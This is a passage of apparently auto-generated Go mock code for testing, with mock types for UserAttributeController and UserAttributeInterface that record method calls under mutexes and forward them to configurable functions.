mock.calls.AddClusterScopedHandler = append(mock.calls.AddClusterScopedHandler, callInfo)
lockUserAttributeControllerMockAddClusterScopedHandler.Unlock()
mock.AddClusterScopedHandlerFunc(ctx, name, clusterName, handler)
}
// AddClusterScopedHandlerCalls gets all the calls that were made to AddClusterScopedHandler.
// Check the length with:
// len(mockedUserAttributeController.AddClusterScopedHandlerCalls())
func (mock *UserAttributeControllerMock) AddClusterScopedHandlerCalls() []struct {
Ctx context.Context
Name string
ClusterName string
Handler v3.UserAttributeHandlerFunc
} {
var calls []struct {
Ctx context.Context
Name string
ClusterName string
Handler v3.UserAttributeHandlerFunc
}
lockUserAttributeControllerMockAddClusterScopedHandler.RLock()
calls = mock.calls.AddClusterScopedHandler
lockUserAttributeControllerMockAddClusterScopedHandler.RUnlock()
return calls
}
// AddHandler calls AddHandlerFunc.
func (mock *UserAttributeControllerMock) AddHandler(ctx context.Context, name string, handler v3.UserAttributeHandlerFunc) {
if mock.AddHandlerFunc == nil {
panic("UserAttributeControllerMock.AddHandlerFunc: method is nil but UserAttributeController.AddHandler was just called")
}
callInfo := struct {
Ctx context.Context
Name string
Handler v3.UserAttributeHandlerFunc
}{
Ctx: ctx,
Name: name,
Handler: handler,
}
lockUserAttributeControllerMockAddHandler.Lock()
mock.calls.AddHandler = append(mock.calls.AddHandler, callInfo)
lockUserAttributeControllerMockAddHandler.Unlock()
mock.AddHandlerFunc(ctx, name, handler)
}
// AddHandlerCalls gets all the calls that were made to AddHandler.
// Check the length with:
// len(mockedUserAttributeController.AddHandlerCalls())
func (mock *UserAttributeControllerMock) AddHandlerCalls() []struct {
Ctx context.Context
Name string
Handler v3.UserAttributeHandlerFunc
} {
var calls []struct {
Ctx context.Context
Name string
Handler v3.UserAttributeHandlerFunc
}
lockUserAttributeControllerMockAddHandler.RLock()
calls = mock.calls.AddHandler
lockUserAttributeControllerMockAddHandler.RUnlock()
return calls
}
// Enqueue calls EnqueueFunc.
func (mock *UserAttributeControllerMock) Enqueue(namespace string, name string) {
if mock.EnqueueFunc == nil {
panic("UserAttributeControllerMock.EnqueueFunc: method is nil but UserAttributeController.Enqueue was just called")
}
callInfo := struct {
Namespace string
Name string
}{
Namespace: namespace,
Name: name,
}
lockUserAttributeControllerMockEnqueue.Lock()
mock.calls.Enqueue = append(mock.calls.Enqueue, callInfo)
lockUserAttributeControllerMockEnqueue.Unlock()
mock.EnqueueFunc(namespace, name)
}
// EnqueueCalls gets all the calls that were made to Enqueue.
// Check the length with:
// len(mockedUserAttributeController.EnqueueCalls())
func (mock *UserAttributeControllerMock) EnqueueCalls() []struct {
Namespace string
Name string
} {
var calls []struct {
Namespace string
Name string
}
lockUserAttributeControllerMockEnqueue.RLock()
calls = mock.calls.Enqueue
lockUserAttributeControllerMockEnqueue.RUnlock()
return calls
}
// Generic calls GenericFunc.
func (mock *UserAttributeControllerMock) Generic() controller.GenericController {
if mock.GenericFunc == nil {
panic("UserAttributeControllerMock.GenericFunc: method is nil but UserAttributeController.Generic was just called")
}
callInfo := struct {
}{}
lockUserAttributeControllerMockGeneric.Lock()
mock.calls.Generic = append(mock.calls.Generic, callInfo)
lockUserAttributeControllerMockGeneric.Unlock()
return mock.GenericFunc()
}
// GenericCalls gets all the calls that were made to Generic.
// Check the length with:
// len(mockedUserAttributeController.GenericCalls())
func (mock *UserAttributeControllerMock) GenericCalls() []struct {
} {
var calls []struct {
}
lockUserAttributeControllerMockGeneric.RLock()
calls = mock.calls.Generic
lockUserAttributeControllerMockGeneric.RUnlock()
return calls
}
// Informer calls InformerFunc.
func (mock *UserAttributeControllerMock) Informer() cache.SharedIndexInformer {
if mock.InformerFunc == nil {
panic("UserAttributeControllerMock.InformerFunc: method is nil but UserAttributeController.Informer was just called")
}
callInfo := struct {
}{}
lockUserAttributeControllerMockInformer.Lock()
mock.calls.Informer = append(mock.calls.Informer, callInfo)
lockUserAttributeControllerMockInformer.Unlock()
return mock.InformerFunc()
}
// InformerCalls gets all the calls that were made to Informer.
// Check the length with:
// len(mockedUserAttributeController.InformerCalls())
func (mock *UserAttributeControllerMock) InformerCalls() []struct {
} {
var calls []struct {
}
lockUserAttributeControllerMockInformer.RLock()
calls = mock.calls.Informer
lockUserAttributeControllerMockInformer.RUnlock()
return calls
}
// Lister calls ListerFunc.
func (mock *UserAttributeControllerMock) Lister() v3.UserAttributeLister {
if mock.ListerFunc == nil {
panic("UserAttributeControllerMock.ListerFunc: method is nil but UserAttributeController.Lister was just called")
}
callInfo := struct {
}{}
lockUserAttributeControllerMockLister.Lock()
mock.calls.Lister = append(mock.calls.Lister, callInfo)
lockUserAttributeControllerMockLister.Unlock()
return mock.ListerFunc()
}
// ListerCalls gets all the calls that were made to Lister.
// Check the length with:
// len(mockedUserAttributeController.ListerCalls())
func (mock *UserAttributeControllerMock) ListerCalls() []struct {
} {
var calls []struct {
}
lockUserAttributeControllerMockLister.RLock()
calls = mock.calls.Lister
lockUserAttributeControllerMockLister.RUnlock()
return calls
}
// Start calls StartFunc.
func (mock *UserAttributeControllerMock) Start(ctx context.Context, threadiness int) error {
if mock.StartFunc == nil {
panic("UserAttributeControllerMock.StartFunc: method is nil but UserAttributeController.Start was just called")
}
callInfo := struct {
Ctx context.Context
Threadiness int
}{
Ctx: ctx,
Threadiness: threadiness,
}
lockUserAttributeControllerMockStart.Lock()
mock.calls.Start = append(mock.calls.Start, callInfo)
lockUserAttributeControllerMockStart.Unlock()
return mock.StartFunc(ctx, threadiness)
}
// StartCalls gets all the calls that were made to Start.
// Check the length with:
// len(mockedUserAttributeController.StartCalls())
func (mock *UserAttributeControllerMock) StartCalls() []struct {
Ctx context.Context
Threadiness int
} {
var calls []struct {
Ctx context.Context
Threadiness int
}
lockUserAttributeControllerMockStart.RLock()
calls = mock.calls.Start
lockUserAttributeControllerMockStart.RUnlock()
return calls
}
// Sync calls SyncFunc.
func (mock *UserAttributeControllerMock) Sync(ctx context.Context) error {
if mock.SyncFunc == nil {
panic("UserAttributeControllerMock.SyncFunc: method is nil but UserAttributeController.Sync was just called")
}
callInfo := struct {
Ctx context.Context
}{
Ctx: ctx,
}
lockUserAttributeControllerMockSync.Lock()
mock.calls.Sync = append(mock.calls.Sync, callInfo)
lockUserAttributeControllerMockSync.Unlock()
return mock.SyncFunc(ctx)
}
// SyncCalls gets all the calls that were made to Sync.
// Check the length with:
// len(mockedUserAttributeController.SyncCalls())
func (mock *UserAttributeControllerMock) SyncCalls() []struct {
Ctx context.Context
} {
var calls []struct {
Ctx context.Context
}
lockUserAttributeControllerMockSync.RLock()
calls = mock.calls.Sync
lockUserAttributeControllerMockSync.RUnlock()
return calls
}
var (
lockUserAttributeInterfaceMockAddClusterScopedHandler sync.RWMutex
lockUserAttributeInterfaceMockAddClusterScopedLifecycle sync.RWMutex
lockUserAttributeInterfaceMockAddHandler sync.RWMutex
lockUserAttributeInterfaceMockAddLifecycle sync.RWMutex
lockUserAttributeInterfaceMockController sync.RWMutex
lockUserAttributeInterfaceMockCreate sync.RWMutex
lockUserAttributeInterfaceMockDelete sync.RWMutex
lockUserAttributeInterfaceMockDeleteCollection sync.RWMutex
lockUserAttributeInterfaceMockDeleteNamespaced sync.RWMutex
lockUserAttributeInterfaceMockGet sync.RWMutex
lockUserAttributeInterfaceMockGetNamespaced sync.RWMutex
lockUserAttributeInterfaceMockList sync.RWMutex
lockUserAttributeInterfaceMockObjectClient sync.RWMutex
lockUserAttributeInterfaceMockUpdate sync.RWMutex
lockUserAttributeInterfaceMockWatch sync.RWMutex
)
// Ensure, that UserAttributeInterfaceMock does implement UserAttributeInterface.
// If this is not the case, regenerate this file with moq.
var _ v3.UserAttributeInterface = &UserAttributeInterfaceMock{}
// UserAttributeInterfaceMock is a mock implementation of UserAttributeInterface.
//
// func TestSomethingThatUsesUserAttributeInterface(t *testing.T) {
//
// // make and configure a mocked UserAttributeInterface
// mockedUserAttributeInterface := &UserAttributeInterfaceMock{
// AddClusterScopedHandlerFunc: func(ctx context.Context, name string, clusterName string, sync v3.UserAttributeHandlerFunc) {
// panic("mock out the AddClusterScopedHandler method")
// },
// AddClusterScopedLifecycleFunc: func(ctx context.Context, name string, clusterName string, lifecycle v3.UserAttributeLifecycle) {
// panic("mock out the AddClusterScopedLifecycle method")
// },
// AddHandlerFunc: func(ctx context.Context, name string, sync v3.UserAttributeHandlerFunc) {
// panic("mock out the AddHandler method")
// },
// AddLifecycleFunc: func(ctx context.Context, name string, lifecycle v3.UserAttributeLifecycle) {
// panic("mock out the AddLifecycle method")
// },
// ControllerFunc: func() v3.UserAttributeController {
// panic("mock out the Controller method")
// },
// CreateFunc: func(in1 *v3.UserAttribute) (*v3.UserAttribute, error) {
// panic("mock out the Create method")
// },
// DeleteFunc: func(name string, options *v1.DeleteOptions) error {
// panic("mock out the Delete method")
// },
// DeleteCollectionFunc: func(deleteOpts *v1.DeleteOptions, listOpts v1.ListOptions) error {
// panic("mock out the DeleteCollection method")
// },
// DeleteNamespacedFunc: func(namespace string, name string, options *v1.DeleteOptions) error {
// panic("mock out the DeleteNamespaced method")
// },
// GetFunc: func(name string, opts v1.GetOptions) (*v3.UserAttribute, error) {
// panic("mock out the Get method")
// },
// GetNamespacedFunc: func(namespace string, name string, opts v1.GetOptions) (*v3.UserAttribute, error) {
// panic("mock out the GetNamespaced method")
// },
// ListFunc: func(opts v1.ListOptions) (*v3.UserAttributeList, error) {
// panic("mock out the List method")
// },
// ObjectClientFunc: func() *objectclient.ObjectClient {
// panic("mock out the ObjectClient method")
// },
// UpdateFunc: func(in1 *v3.UserAttribute) (*v3.UserAttribute, error) {
// panic("mock out the Update method")
// },
// WatchFunc: func(opts v1.ListOptions) (watch.Interface, error) {
// panic("mock out the Watch method")
// },
// }
//
// // use mockedUserAttributeInterface in code that requires UserAttributeInterface
// // and then make assertions.
//
// }
type UserAttributeInterfaceMock struct {
// AddClusterScopedHandlerFunc mocks the AddClusterScopedHandler method.
AddClusterScopedHandlerFunc func(ctx context.Context, name string, clusterName string, sync v3.UserAttributeHandlerFunc)
// AddClusterScopedLifecycleFunc mocks the AddClusterScopedLifecycle method.
AddClusterScopedLifecycleFunc func(ctx context.Context, name string, clusterName string, lifecycle v3.UserAttributeLifecycle)
// AddHandlerFunc mocks the AddHandler method.
AddHandlerFunc func(ctx context.Context, name string, sync v3.UserAttributeHandlerFunc)
// AddLifecycleFunc mocks the AddLifecycle method.
AddLifecycleFunc func(ctx context.Context, name string, lifecycle v3.UserAttributeLifecycle)
// ControllerFunc mocks the Controller method.
ControllerFunc func() v3.UserAttributeController
// CreateFunc mocks the Create method.
CreateFunc func(in1 *v3.UserAttribute) (*v3.UserAttribute, error)
// DeleteFunc mocks the Delete method.
DeleteFunc func(name string, options *v1.DeleteOptions) error
// DeleteCollectionFunc mocks the DeleteCollection method.
DeleteCollectionFunc func(deleteOpts *v1.DeleteOptions, listOpts v1.ListOptions) error
// DeleteNamespacedFunc mocks the DeleteNamespaced method.
DeleteNamespacedFunc func(namespace string, name string, options *v1.DeleteOptions) error
// GetFunc mocks the Get method.
GetFunc func(name string, opts v1.GetOptions) (*v3.UserAttribute, error)
// GetNamespacedFunc mocks the GetNamespaced method.
GetNamespacedFunc func(namespace string, name string, opts v1.GetOptions) (*v3.UserAttribute, error)
// ListFunc mocks the List method.
ListFunc func(opts v1.ListOptions) (*v3.UserAttributeList, error)
// ObjectClientFunc mocks the ObjectClient method.
ObjectClientFunc func() *objectclient.ObjectClient
// UpdateFunc mocks the Update method.
UpdateFunc func(in1 *v3.UserAttribute) (*v3.UserAttribute, error)
// WatchFunc mocks the Watch method.
WatchFunc func(opts v1.ListOptions) (watch.Interface, error)
// calls tracks calls to the methods.
calls struct {
// AddClusterScopedHandler holds details about calls to the AddClusterScopedHandler method.
AddClusterScopedHandler []struct {
// Ctx is the ctx argument value.
Ctx context.Context
// Name is the name argument value.
Name string
// ClusterName is the clusterName argument value.
ClusterName string
// Sync is the sync argument value.
Sync v3.UserAttributeHandlerFunc
}
// AddClusterScopedLifecycle holds details about calls to the AddClusterScopedLifecycle method.
AddClusterScopedLifecycle []struct {
// Ctx is the ctx argument value.
Ctx context.Context
// Name is the name argument value.
Name string
// ClusterName is the clusterName argument value.
ClusterName string
// Lifecycle is the lifecycle argument value.
Lifecycle v3.UserAttributeLifecycle
}
// AddHandler holds details about calls to the AddHandler method.
AddHandler []struct {
// Ctx is the ctx argument value.
Ctx context.Context
// Name is the name argument value.
Name string
// Sync is the sync argument value.
Sync v3.UserAttributeHandlerFunc
}
// AddLifecycle holds details about calls to the AddLifecycle method.
AddLifecycle []struct {
// Ctx is the ctx argument value.
Ctx context.Context
// Name is the name argument value.
Name string
// Lifecycle is the lifecycle argument value.
Lifecycle v3.UserAttributeLifecycle
}
// Controller holds details about calls to the Controller method.
Controller []struct {
}
// Create holds details about calls to the Create method.
Create []struct {
// In1 is the in1 argument value.
In1 *v3.UserAttribute
}
// Delete holds details about calls to the Delete method.
Delete []struct {
// Name is the name argument value.
Name string
// Options is the options argument value.
Options *v1.DeleteOptions
}
// DeleteCollection holds details about calls to the DeleteCollection method.
DeleteCollection []struct {
// DeleteOpts is the deleteOpts argument value.
DeleteOpts *v1.DeleteOptions
// ListOpts is the listOpts argument value.
ListOpts v1.ListOptions
}
// DeleteNamespaced holds details about calls to the DeleteNamespaced method.
DeleteNamespaced []struct {
// Namespace is the namespace argument value.
Namespace string
// Name is the name argument value.
Name string
// Options is the options argument value.
Options *v1.DeleteOptions
}
// Get holds details about calls to the Get method.
Get []struct {
// Name is the name argument value.
Name string
// Opts is the opts argument value.
Opts v1.GetOptions
}
// GetNamespaced holds details about calls to the GetNamespaced method.
GetNamespaced []struct {
// Namespace is the namespace argument value.
Namespace string
// Name is the name argument value.
Name string
// Opts is the opts argument value.
Opts v1.GetOptions
}
// List holds details about calls to the List method.
List []struct {
// Opts is the opts argument value.
Opts v1.ListOptions
}
// ObjectClient holds details about calls to the ObjectClient method.
ObjectClient []struct {
}
// Update holds details about calls to the Update method.
Update []struct {
// In1 is the in1 argument value.
In1 *v3.UserAttribute
}
// Watch holds details about calls to the Watch method.
Watch []struct {
// Opts is the opts argument value.
Opts v1.ListOptions
}
}
}
// AddClusterScopedHandler calls AddClusterScopedHandlerFunc.
func (mock *UserAttributeInterfaceMock) AddClusterScopedHandler(ctx context.Context, name string, clusterName string, sync v3.UserAttributeHandlerFunc) {
if mock.AddClusterScopedHandlerFunc == nil {
panic("UserAttributeInterfaceMock.AddClusterScopedHandlerFunc: method is nil but UserAttributeInterface.AddClusterScopedHandler was just called")
}
callInfo := struct {
Ctx context.Context
Name string
ClusterName string
Sync v3.UserAttributeHandlerFunc
}{
Ctx: ctx,
Name: name,
ClusterName: clusterName,
Sync: sync,
}
lockUserAttributeInterfaceMockAddClusterScopedHandler.Lock()
mock.calls.AddClusterScopedHandler = append(mock.calls.AddClusterScopedHandler, callInfo)
lockUserAttributeInterfaceMockAddClusterScopedHandler.Unlock()
mock.AddClusterScopedHandlerFunc(ctx, name, clusterName, sync)
}
// AddClusterScopedHandlerCalls gets all the calls that were made to AddClusterScopedHandler.
// Check the length with:
// len(mockedUserAttributeInterface.AddClusterScopedHandlerCalls())
func (mock *UserAttributeInterfaceMock) AddClusterScopedHandlerCalls() []struct {
Ctx context.Context
Name string
ClusterName string
Sync v3.UserAttributeHandlerFunc
} {
var calls []struct {
Ctx context.Context
Name string
ClusterName string
Sync v3.UserAttributeHandlerFunc
}
lockUserAttributeInterfaceMockAddClusterScopedHandler.RLock()
calls = mock.calls.AddClusterScopedHandler
lockUserAttributeInterfaceMockAddClusterScopedHandler.RUnlock()
return calls
}
// AddClusterScopedLifecycle calls AddClusterScopedLifecycleFunc.
func (mock *UserAttributeInterfaceMock) AddClusterScopedLifecycle(ctx context.Context, name string, clusterName string, lifecycle v3.UserAttributeLifecycle) {
if mock.AddClusterScopedLifecycleFunc == nil {
panic("UserAttributeInterfaceMock.AddClusterScopedLifecycleFunc: method is nil but UserAttributeInterface.AddClusterScopedLifecycle was just called")
}
callInfo := struct {
Ctx context.Context
Name string
ClusterName string
Lifecycle v3.UserAttributeLifecycle
}{
Ctx: ctx,
Name: name,
ClusterName: clusterName,
Lifecycle: lifecycle,
}
lockUserAttributeInterfaceMockAddClusterScopedLifecycle.Lock()
mock.calls.AddClusterScopedLifecycle = append(mock.calls.AddClusterScopedLifecycle, callInfo)
lockUserAttributeInterfaceMockAddClusterScopedLifecycle.Unlock()
mock.AddClusterScopedLifecycleFunc(ctx, name, clusterName, lifecycle)
}
// AddClusterScopedLifecycleCalls gets all the calls that were made to AddClusterScopedLifecycle.
// Check the length with:
// len(mockedUserAttributeInterface.AddClusterScopedLifecycleCalls())
func (mock *UserAttributeInterfaceMock) AddClusterScopedLifecycleCalls() []struct {
Ctx context.Context
Name string
ClusterName string
Lifecycle v3.UserAttributeLifecycle
} {
var calls []struct {
Ctx context.Context
Name string
ClusterName string
Lifecycle v3.UserAttributeLifecycle
}
lockUserAttributeInterfaceMockAddClusterScopedLifecycle.RLock()
calls = mock.calls.AddClusterScopedLifecycle
lockUserAttributeInterfaceMockAddClusterScopedLifecycle.RUnlock()
return calls
}
// AddHandler calls AddHandlerFunc.
func (mock *UserAttributeInterfaceMock) AddHandler(ctx context.Context, name string, sync v3.UserAttributeHandlerFunc) {
if mock.AddHandlerFunc == nil {
panic("UserAttributeInterfaceMock.AddHandlerFunc: method is nil but UserAttributeInterface.AddHandler was just called")
}
callInfo := struct {
Ctx context.Context
Name string
Sync v3.UserAttributeHandlerFunc
}{
Ctx: ctx,
Name: name,
Sync: sync,
}
lockUserAttributeInterfaceMockAddHandler.Lock()
mock.calls.AddHandler = append(mock.calls.AddHandler, callInfo)
lockUserAttributeInterfaceMockAddHandler.Unlock()
mock.AddHandlerFunc(ctx, name, sync)
}
// AddHandlerCalls gets all the calls that were made to AddHandler.
// Check the length with:
// len(mockedUserAttributeInterface.AddHandlerCalls())
func (mock *UserAttributeInterfaceMock) AddHandlerCalls() []struct {
Ctx context.Context
Name string
Sync v3.UserAttributeHandlerFunc
} {
var calls []struct {
Ctx context.Context
Name string
Sync v3.UserAttributeHandlerFunc
}
lockUserAttributeInterfaceMockAddHandler.RLock()
calls = mock.calls.AddHandler
lockUserAttributeInterfaceMockAddHandler.RUnlock()
return calls
}
// AddLifecycle calls AddLifecycleFunc.
func (mock *UserAttributeInterfaceMock) AddLifecycle(ctx context.Context, name string, lifecycle v3.UserAttributeLifecycle) {
if mock.AddLifecycleFunc == nil {
panic("UserAttributeInterfaceMock.AddLifecycleFunc: method is nil but UserAttributeInterface.AddLifecycle was just called")
}
callInfo := struct {
Ctx context.Context
Name string
Lifecycle v3.UserAttributeLifecycle
}{
Ctx: ctx,
Name: name,
Lifecycle: lifecycle,
}
lockUserAttributeInterfaceMockAddLifecycle.Lock()
mock.calls.AddLifecycle = append(mock.calls.AddLifecycle, callInfo)
lockUserAttributeInterfaceMockAddLifecycle.Unlock()
mock.AddLifecycleFunc(ctx, name, lifecycle)
}
// AddLifecycleCalls gets all the calls that were made to AddLifecycle.
// Check the length with:
// len(mockedUserAttributeInterface.AddLifecycleCalls())
func (mock *UserAttributeInterfaceMock) AddLifecycleCalls() []struct {
Ctx context.Context
Name string
Lifecycle v3.UserAttributeLifecycle
} {
var calls []struct {
Ctx context.Context
Name string
Lifecycle v3.UserAttributeLifecycle
}
lockUserAttributeInterfaceMockAddLifecycle.RLock()
calls = mock.calls.AddLifecycle
lockUserAttributeInterfaceMockAddLifecycle.RUnlock()
return calls
}
// Controller calls ControllerFunc.
func (mock *UserAttributeInterfaceMock) Controller() v3.UserAttributeController {
if mock.ControllerFunc == nil {
panic("UserAttributeInterfaceMock.ControllerFunc: method is nil but UserAttributeInterface.Controller was just called")
}
callInfo := struct {
}{}
lockUserAttributeInterfaceMockController.Lock()
mock.calls.Controller = append(mock.calls.Controller, callInfo)
lockUserAttributeInterfaceMockController.Unlock()
return mock.ControllerFunc()
}
// ControllerCalls gets all the calls that were made to Controller.
// Check the length with:
// len(mockedUserAttributeInterface.ControllerCalls())
func (mock *UserAttributeInterfaceMock) ControllerCalls() []struct {
} {
var calls []struct {
}
lockUserAttributeInterfaceMockController.RLock()
calls = mock.calls.Controller
lockUserAttributeInterfaceMockController.RUnlock()
return calls
}
// Create calls CreateFunc.
func (mock *UserAttributeInterfaceMock) Create(in1 *v3.UserAttribute) (*v3.UserAttribute, error) {
if mock.CreateFunc == nil {
panic("UserAttributeInterfaceMock.CreateFunc: method is nil but UserAttributeInterface.Create was just called")
}
callInfo := struct {
In1 *v3.UserAttribute
}{
In1: in1,
}
lockUserAttributeInterfaceMockCreate.Lock()
mock.calls.Create = append(mock.calls.Create, callInfo)
lockUserAttributeInterfaceMockCreate.Unlock()
return mock.CreateFunc(in1)
}
// CreateCalls gets all the calls that were made to Create.
// Check the length with:
// len(mockedUserAttributeInterface.CreateCalls())
func (mock *UserAttributeInterfaceMock) CreateCalls() []struct {
In1 *v3.UserAttribute
} {
var calls []struct {
In1 *v3.UserAttribute
}
lockUserAttributeInterfaceMockCreate.RLock()
calls = mock.calls.Create
lockUserAttributeInterfaceMockCreate.RUnlock()
return calls
}
// Delete calls DeleteFunc.
func (mock *UserAttributeInterfaceMock) Delete(name string, options *v1.DeleteOptions) error {
if mock.DeleteFunc == nil {
panic("UserAttributeInterfaceMock.DeleteFunc: method is nil but UserAttributeInterface.Delete was just called")
}
callInfo := struct {
Name string
Options *v1.DeleteOptions
}{
Name: name,
Options: options,
}
lockUserAttributeInterfaceMockDelete.Lock()
mock.calls.Delete = append(mock.calls.Delete, callInfo)
lockUserAttributeInterfaceMockDelete.Unlock()
return mock.DeleteFunc(name, options)
}
// DeleteCalls gets all the calls that were made to Delete.
// Check the length with:
// len(mockedUserAttributeInterface.DeleteCalls())
func (mock *UserAttributeInterfaceMock) DeleteCalls() []struct {
Name string
Options *v1.DeleteOptions
} {
var calls []struct {
Name string
Options *v1.DeleteOptions
}
lockUserAttributeInterfaceMockDelete.RLock()
calls = mock.calls.Delete
lockUserAttributeInterfaceMockDelete.RUnlock()
return calls
}
// DeleteCollection calls DeleteCollectionFunc.
func (mock *UserAttributeInterfaceMock) DeleteCollection(deleteOpts *v1.DeleteOptions, listOpts v1.ListOptions) error {
if mock.DeleteCollectionFunc == nil {
panic("UserAttributeInterfaceMock.DeleteCollectionFunc: method is nil but UserAttributeInterface.DeleteCollection was just called")
}
callInfo := struct {
DeleteOpts *v1.DeleteOptions
ListOpts v1.ListOptions
}{
DeleteOpts: deleteOpts,
ListOpts: listOpts,
}
lockUserAttributeInterfaceMockDeleteCollection.Lock()
mock.calls.DeleteCollection = append(mock.calls.DeleteCollection, callInfo)
lockUserAttributeInterfaceMockDeleteCollection.Unlock()
return mock.DeleteCollectionFunc(deleteOpts, listOpts)
}
// DeleteCollectionCalls gets all the calls that were made to DeleteCollection.
// Check the length with:
// len(mockedUserAttributeInterface.DeleteCollectionCalls())
func (mock *UserAttributeInterfaceMock) DeleteCollectionCalls() []struct {
DeleteOpts *v1.DeleteOptions
ListOpts v1.ListOptions
} {
var calls []struct {
DeleteOpts *v1.DeleteOptions
ListOpts v1.ListOptions
}
lockUserAttributeInterfaceMockDeleteCollection.RLock()
calls = mock.calls.DeleteCollection
lockUserAttributeInterfaceMockDeleteCollection.RUnlock()
return calls
}
// DeleteNamespaced calls DeleteNamespacedFunc.
func (mock *UserAttributeInterfaceMock) DeleteNamespaced(namespace string, name string, options *v1.DeleteOptions) error {
if mock.DeleteNamespacedFunc == nil {
panic("UserAttributeInterfaceMock.DeleteNamespacedFunc: method is nil but UserAttributeInterface.DeleteNamespaced was just called")
}
callInfo := struct {
Namespace string
Name string
Options *v1.DeleteOptions
}{
Namespace: namespace,
Name: name,
Options: options,
}
lockUserAttributeInterfaceMockDeleteNamespaced.Lock()
mock.calls.DeleteNamespaced = append(mock.calls.DeleteNamespaced, callInfo)
lockUserAttributeInterfaceMockDeleteNamespaced.Unlock()
return mock.DeleteNamespacedFunc(namespace, name, options)
}
// DeleteNamespacedCalls gets all the calls that were made to DeleteNamespaced.
// Check the length with:
// len(mockedUserAttributeInterface.DeleteNamespacedCalls())
func (mock *UserAttributeInterfaceMock) DeleteNamespacedCalls() []struct {
Namespace string
Name string
Options *v1.DeleteOptions
} {
var calls []struct {
Namespace string
Name string
Options *v1.DeleteOptions
}
lockUserAttributeInterfaceMockDeleteNamespaced.RLock()
calls = mock.calls.DeleteNamespaced
lockUserAttributeInterfaceMockDeleteNamespaced.RUnlock()
return calls
}
// Get calls GetFunc.
func (mock *UserAttributeInterfaceMock) Get(name string, opts v1.GetOptions) (*v3.UserAttribute, error) {
if mock.GetFunc == nil {
panic("UserAttributeInterfaceMock.GetFunc: method is nil but UserAttributeInterface.Get was just called")
}
callInfo := struct {
Name string
Opts v1.GetOptions
}{
Name: name,
Opts: opts,
}
lockUserAttributeInterfaceMockGet.Lock()
mock.calls.Get = append(mock.calls.Get, callInfo)
lockUserAttributeInterfaceMockGet.Unlock()
return mock.GetFunc(name, opts)
}
// GetCalls gets all the calls that were made to Get.
// Check the length with:
// len(mockedUserAttributeInterface.GetCalls())
func (mock *UserAttributeInterfaceMock) GetCalls() []struct {
Name string
Opts v1.GetOptions
} {
var calls []struct {
Name string
Opts v1.GetOptions
}
lockUserAttributeInterfaceMockGet.RLock()
calls = mock.calls.Get
lockUserAttributeInterfaceMockGet.RUnlock()
return calls
}
// GetNamespaced calls GetNamespacedFunc.
func (mock *UserAttributeInterfaceMock) GetNamespaced(namespace string, name string, opts v1.GetOptions) (*v3.UserAttribute, error) {
if mock.GetNamespacedFunc == nil {
panic("UserAttributeInterfaceMock.GetNamespacedFunc: method is nil but UserAttributeInterface.GetNamespaced was just called")
}
callInfo := struct {
Namespace string
Name string
Opts v1.GetOptions
}{
Namespace: namespace,
Name: name,
Opts: opts,
}
lockUserAttributeInterfaceMockGetNamespaced.Lock()
mock.calls.GetNamespaced = append(mock.calls.GetNamespaced, callInfo)
lockUserAttributeInterfaceMockGetNamespaced.Unlock()
return mock.GetNamespacedFunc(namespace, name, opts)
}
// GetNamespacedCalls gets all the calls that were made to GetNamespaced.
// Check the length with:
// len(mockedUserAttributeInterface.GetNamespacedCalls())
func (mock *UserAttributeInterfaceMock) GetNamespacedCalls() []struct {
Namespace string
Name string
Opts v1.GetOptions
} {
var calls []struct {
Namespace string
Name string
Opts v1.GetOptions
}
lockUserAttributeInterfaceMockGetNamespaced.RLock()
calls = mock.calls.GetNamespaced
lockUserAttributeInterfaceMockGetNamespaced.RUnlock()
return calls
}
// List calls ListFunc.
func (mock *UserAttributeInterfaceMock) List(opts v1.ListOptions) (*v3.UserAttributeList, error) {
if mock.ListFunc == nil {
panic("UserAttributeInterfaceMock.ListFunc: method is nil but UserAttributeInterface.List was just called")
}
callInfo := struct {
Opts v1.ListOptions
}{
Opts: opts,
}
lockUserAttributeInterfaceMockList.Lock()
mock.calls.List = append(mock.calls.List, callInfo)
lockUserAttributeInterfaceMockList.Unlock()
return mock.ListFunc(opts)
}
// ListCalls gets all the calls that were made to List.
// Check the length with:
// len(mockedUserAttributeInterface.ListCalls())
func (mock *UserAttributeInterfaceMock) ListCalls() []struct {
Opts v1.ListOptions
} {
var calls []struct {
Opts v1.ListOptions
}
lockUserAttributeInterfaceMockList.RLock()
calls = mock.calls.List
lockUserAttributeInterfaceMockList.RUnlock()
return calls
}
// ObjectClient calls ObjectClientFunc.
func (mock *UserAttributeInterfaceMock) ObjectClient() *objectclient.ObjectClient {
if mock.ObjectClientFunc == nil {
panic("UserAttributeInterfaceMock.ObjectClientFunc: method is nil but UserAttributeInterface.ObjectClient was just called")
}
callInfo := struct {
}{}
lockUserAttributeInterfaceMockObjectClient.Lock()
mock.calls.ObjectClient = append(mock.calls.ObjectClient, callInfo)
lockUserAttributeInterfaceMockObjectClient.Unlock()
return mock.ObjectClientFunc()
}
// ObjectClientCalls gets all the calls that were made to ObjectClient.
// Check the length with:
// len(mockedUserAttributeInterface.ObjectClientCalls())
func (mock *UserAttributeInterfaceMock) ObjectClientCalls() []struct {
} {
var calls []struct {
}
lockUserAttributeInterfaceMockObjectClient.RLock()
calls = mock.calls.ObjectClient
lockUserAttributeInterfaceMockObjectClient.RUnlock()
return calls
}
// Update calls UpdateFunc.
func (mock *UserAttributeInterfaceMock) Update(in1 *v3.UserAttribute) (*v3.UserAttribute, error) {
if mock.UpdateFunc == nil {
panic("UserAttributeInterfaceMock.UpdateFunc: method is nil but UserAttributeInterface.Update was just called")
}
callInfo := struct {
In1 *v3.UserAttribute
}{
In1: in1,
}
lockUserAttributeInterfaceMockUpdate.Lock()
mock.calls.Update = append(mock.calls.Update, callInfo)
lockUserAttributeInterfaceMockUpdate.Unlock()
return mock.UpdateFunc(in1)
}
// UpdateCalls gets all the calls that were made to Update.
// Check the length with:
// len(mockedUserAttributeInterface.UpdateCalls())
func (mock *UserAttributeInterfaceMock) UpdateCalls() []struct {
In1 *v3.UserAttribute
} {
var calls []struct {
In1 *v3.UserAttribute
}
lockUserAttributeInterfaceMockUpdate.RLock()
calls = mock.calls.Update
lockUserAttributeInterfaceMockUpdate.RUnlock()
return calls
}
// Watch calls WatchFunc.
func (mock *UserAttributeInterfaceMock) Watch(opts v1.ListOptions) (watch.Interface, error) {
if mock.WatchFunc == nil {
panic("UserAttributeInterfaceMock.WatchFunc: method is nil but UserAttributeInterface.Watch was just called")
}
callInfo := struct {
Opts v1.ListOptions
}{
Opts: opts,
}
lockUserAttributeInterfaceMockWatch.Lock()
mock.calls.Watch = append(mock.calls.Watch, callInfo)
lockUserAttributeInterfaceMockWatch.Unlock()
